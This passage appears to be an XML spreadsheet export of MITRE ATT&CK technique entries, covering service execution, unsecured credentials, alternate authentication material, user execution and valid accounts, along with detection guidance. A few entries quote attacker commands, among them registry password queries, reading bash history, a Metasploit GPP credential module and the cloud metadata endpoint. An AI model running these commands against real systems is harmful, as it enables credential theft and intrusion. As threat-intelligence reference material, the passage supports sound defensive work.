    <s v="Windows, macOS"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1569.001"/>
    <x v="502"/>
    <s v="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_x000a__x000a_By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)_x000a__x000a_Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute &quot;arg&quot; &quot;arg&quot; &quot;arg&quot;&lt;/code&gt;. Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process."/>
    <s v="https://attack.mitre.org/techniques/T1569/001"/>
    <d v="2020-03-10T00:00:00"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="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
    <s v="macOS"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation"/>
    <b v="1"/>
    <s v="T1569"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1569.002"/>
    <x v="503"/>
    <s v="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_x000a__x000a_[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1569/002"/>
    <d v="2020-03-10T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1569"/>
    <m/>
    <m/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1529"/>
    <x v="504"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1529"/>
    <d v="2019-10-04T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation, Sensor Health: Host Status"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1124"/>
    <x v="505"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1124"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="1.2"/>
    <x v="2"/>
    <s v="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s v="Windows"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="FIRST.ORG's Cyber Threat Intelligence SIG"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1080"/>
    <x v="506"/>
    <s v="_x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1080"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="1.2"/>
    <x v="17"/>
    <s v="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_x000a__x000a_Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content."/>
    <s v="Windows"/>
    <s v="File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="David Routin; Michal Dida, ESET"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1221"/>
    <x v="507"/>
    <s v="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_x000a__x000a_Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded._x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1221"/>
    <d v="2018-10-17T00:00:00"/>
    <d v="2020-04-29T00:00:00"/>
    <n v="1.2"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Brian Wiltse @evalstrings; Patrick Campbell, @pjcampbe11"/>
    <m/>
    <s v="Static File Analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1205"/>
    <x v="508"/>
    <s v="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_x000a__x000a_Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s)._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1205"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-02-17T00:00:00"/>
    <n v="2.2000000000000002"/>
    <x v="26"/>
    <s v="Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows._x000a__x000a_The Wake-on-LAN magic packet consists of 6 bytes of &lt;code&gt;FF&lt;/code&gt; followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)"/>
    <s v="Linux, Network, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Josh Day, Gigamon"/>
    <m/>
    <s v="Defensive network service scanning"/>
    <m/>
  </r>
  <r>
    <s v="T1205.001"/>
    <x v="509"/>
    <s v="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_x000a__x000a_This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1205/001"/>
    <d v="2020-07-01T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="26"/>
    <s v="Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows."/>
    <s v="Linux, Network, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1205"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1537"/>
    <x v="510"/>
    <s v="Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection._x000a__x000a_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_x000a__x000a_Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) "/>
    <s v="https://attack.mitre.org/techniques/T1537"/>
    <d v="2019-08-30T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="8"/>
    <s v="Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. "/>
    <s v="IaaS"/>
    <s v="Cloud Storage: Cloud Storage Creation, Cloud Storage: Cloud Storage Modification, Snapshot: Snapshot Creation, Snapshot: Snapshot Modification"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1127"/>
    <x v="511"/>
    <s v="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 v="https://attack.mitre.org/techniques/T1127"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="1.2"/>
    <x v="12"/>
    <s v="Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious._x000a__x000a_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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Casey Smith; Matthew Demaske, Adaptforward"/>
    <m/>
    <s v="Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1127.001"/>
    <x v="512"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1127/001"/>
    <d v="2020-03-27T00:00:00"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1127"/>
    <s v="Carrie Roberts, @OrOneEqualsOne"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1199"/>
    <x v="513"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1199"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="2.2000000000000002"/>
    <x v="15"/>
    <s v="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
    <s v="IaaS, Linux, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1111"/>
    <x v="514"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1111"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior._x000a__x000a_Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Driver: Driver Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <s v="John Lambert, Microsoft Threat Intelligence Center"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1552"/>
    <x v="515"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1552"/>
    <d v="2020-02-04T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1.2"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like &quot;history&quot; instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;._x000a__x000a_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s v="Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Access"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1552.003"/>
    <x v="516"/>
    <s v="Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the &quot;history&quot;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
    <s v="https://attack.mitre.org/techniques/T1552/003"/>
    <d v="2020-02-04T00:00:00"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like &quot;history&quot; instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;."/>
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Access"/>
    <b v="1"/>
    <s v="T1552"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1552.005"/>
    <x v="517"/>
    <s v="Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data._x000a__x000a_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_x000a__x000a_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_x000a__x000a_The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;._x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1552/005"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="1.2"/>
    <x v="11"/>
    <s v="Monitor access to the Instance Metadata API and look for anomalous queries._x000a__x000a_It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078)."/>
    <s v="IaaS"/>
    <s v="User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1552"/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1552.007"/>
    <x v="518"/>
    <s v="Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1552/007"/>
    <d v="2021-03-31T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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_x000a__x000a_It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078)."/>
    <s v="Containers"/>
    <s v="Command: Command Execution, File: File Access, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1552"/>
    <s v="Center for Threat-Informed Defense (CTID); Jay Chen, Palo Alto Networks; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1552.001"/>
    <x v="519"/>
    <s v="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_x000a__x000a_It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1552/001"/>
    <d v="2020-02-04T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="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s v="Containers, IaaS, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access"/>
    <b v="1"/>
    <s v="T1552"/>
    <s v="Jay Chen, Palo Alto Networks; Microsoft Threat Intelligence Center (MSTIC); Rory McCune, Aqua Security; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1552.002"/>
    <x v="520"/>
    <s v="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_x000a__x000a_Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)_x000a__x000a_* Local Machine Hive: &lt;code&gt;reg query HKLM /f password /t REG_SZ /s&lt;/code&gt;_x000a_* Current User Hive: &lt;code&gt;reg query HKCU /f password /t REG_SZ /s&lt;/code&gt;"/>
    <s v="https://attack.mitre.org/techniques/T1552/002"/>
    <d v="2020-02-04T00:00:00"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access"/>
    <b v="1"/>
    <s v="T1552"/>
    <s v="Sudhanshu Chauhan, @Sudhanshu_C"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1552.006"/>
    <x v="521"/>
    <s v="Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)_x000a__x000a_These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)_x000a__x000a_The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:_x000a__x000a_* Metasploit’s post exploitation module: &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;_x000a_* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)_x000a_* gpprefdecrypt.py_x000a__x000a_On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: &lt;code&gt;dir /s * .xml&lt;/code&gt;_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1552/006"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-06-17T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="Monitor for attempts to access SYSVOL that involve searching for XML files. _x000a__x000a_Deploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)"/>
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Access"/>
    <b v="1"/>
    <s v="T1552"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1552.004"/>
    <x v="522"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)_x000a__x000a_Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line."/>
    <s v="https://attack.mitre.org/techniques/T1552/004"/>
    <d v="2020-02-04T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access"/>
    <b v="1"/>
    <s v="T1552"/>
    <s v="Itzik Kotler, SafeBreach"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1535"/>
    <x v="523"/>
    <s v="Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure._x000a__x000a_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_x000a__x000a_A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1535"/>
    <d v="2019-09-04T00:00:00"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="IaaS"/>
    <s v="Instance: Instance Creation"/>
    <b v="0"/>
    <m/>
    <s v="Netskope"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1550"/>
    <x v="524"/>
    <s v="Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. _x000a__x000a_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_x000a__x000a_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_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1550"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="27"/>
    <s v="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s v="Google Workspace, Office 365, SaaS, Windows"/>
    <s v="Active Directory: Active Directory Credential Request, Application Log: Application Log Content, Logon Session: Logon Session Creation, User Account: User Account Authentication, Web Credential: Web Credential Usage"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="System Access Controls"/>
    <m/>
  </r>
  <r>
    <s v="T1550.001"/>
    <x v="525"/>
    <s v="Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials._x000a__x000a_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_x000a__x000a_For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a &quot;refresh&quot; token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1550/001"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.2"/>
    <x v="27"/>
    <s v="Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs."/>
    <s v="Google Workspace, Office 365, SaaS"/>
    <s v="Application Log: Application Log Content, Web Credential: Web Credential Usage"/>
    <b v="1"/>
    <s v="T1550"/>
    <s v="Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)"/>
    <m/>
    <s v="System Access Controls"/>
    <m/>
  </r>
  <r>
    <s v="T1550.002"/>
    <x v="526"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also use stolen password hashes to &quot;overpass the hash.&quot;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
    <s v="https://attack.mitre.org/techniques/T1550/002"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="27"/>
    <s v="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_x000a__x000a_Event ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)"/>
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Credential Request, Logon Session: Logon Session Creation, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1550"/>
    <s v="Blake Strom, Microsoft 365 Defender; Travis Smith, Tripwire"/>
    <m/>
    <s v="System Access Controls"/>
    <m/>
  </r>
  <r>
    <s v="T1550.003"/>
    <x v="527"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)_x000a__x000a_Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, &quot;overpassing the hash&quot; involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)"/>
    <s v="https://attack.mitre.org/techniques/T1550/003"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="27"/>
    <s v="Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity._x000a__x000a_Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to &quot;Integrity check on decrypted field failed&quot; and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)"/>
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Credential Request, Logon Session: Logon Session Creation, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1550"/>
    <s v="Ryan Becwar; Vincent Le Toux"/>
    <m/>
    <s v="System Access Controls"/>
    <m/>
  </r>
  <r>
    <s v="T1550.004"/>
    <x v="528"/>
    <s v="Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)_x000a__x000a_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_x000a__x000a_There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)"/>
    <s v="https://attack.mitre.org/techniques/T1550/004"/>
    <d v="2020-01-30T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.2"/>
    <x v="27"/>
    <s v="Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations."/>
    <s v="Google Workspace, Office 365, SaaS"/>
    <s v="Application Log: Application Log Content, Web Credential: Web Credential Usage"/>
    <b v="1"/>
    <s v="T1550"/>
    <s v="Johann Rehberger"/>
    <m/>
    <s v="System Access Controls"/>
    <m/>
  </r>
  <r>
    <s v="T1204"/>
    <x v="529"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1204"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="1.3"/>
    <x v="13"/>
    <s v="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_x000a__x000a_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
    <s v="Containers, IaaS, Linux, Windows, macOS"/>
    <s v="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
    <b v="0"/>
    <m/>
    <s v="Oleg Skulkin, Group-IB"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1204.002"/>
    <x v="530"/>
    <s v="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_x000a__x000a_Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1204/002"/>
    <d v="2020-03-11T00:00:00"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1204"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1204.003"/>
    <x v="531"/>
    <s v="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_x000a__x000a_Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005))."/>
    <s v="https://attack.mitre.org/techniques/T1204/003"/>
    <d v="2021-03-30T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="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
    <s v="Containers, IaaS"/>
    <s v="Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start"/>
    <b v="1"/>
    <s v="T1204"/>
    <s v="Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1204.001"/>
    <x v="532"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1204/001"/>
    <d v="2020-03-11T00:00:00"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization._x000a__x000a_Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer."/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content"/>
    <b v="1"/>
    <s v="T1204"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1078"/>
    <x v="533"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1078"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="2.2000000000000002"/>
    <x v="28"/>
    <s v="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_x000a__x000a_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
    <s v="Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Logon Session: Logon Session Creation, User Account: User Account Authentication"/>
    <b v="0"/>
    <m/>
    <s v="Mark Wee; Netskope; Praetorian; Yossi Weizman, Azure Defender Research Team"/>
    <s v="Administrator, User"/>
    <s v="Anti-virus, Application control, Firewall, Host intrusion prevention systems, Network intrusion detection system, System access controls"/>
    <m/>
  </r>
  <r>
    <s v="T1078.004"/>
    <x v="534"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1078/004"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2021-03-16T00:00:00"/>
    <n v="1.2"/>
    <x v="28"/>
    <s v="Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours."/>
    <s v="Azure AD, Google Workspace, IaaS, Office 365, SaaS"/>
    <s v="Logon Session: Logon Session Creation, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1078"/>
    <m/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1078.001"/>
    <x v="535"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1078/001"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="1.2"/>
    <x v="28"/>
    <s v="Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately."/>
    <s v="Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Logon Session: Logon Session Creation, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1078"/>
    <m/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1078.002"/>
    <x v="536"/>
    <s v="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_x000a__x000a_Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain."/>
    <s v="https://attack.mitre.org/techniques/T1078/002"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="28"/>
    <s v="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_x000a__x000a_Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Logon Session: Logon Session Creation, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1078"/>
    <m/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1078.003"/>
    <x v="537"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1078/003"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="28"/>
    <s v="Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours."/>
    <s v="Containers, Linux, Windows, macOS"/>
    <s v="Logon Session: Logon Session Creation, User Account: User Account Authentication"/>
    <b v="1"/>
    <s v="T1078"/>
    <m/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1125"/>
    <x v="538"/>
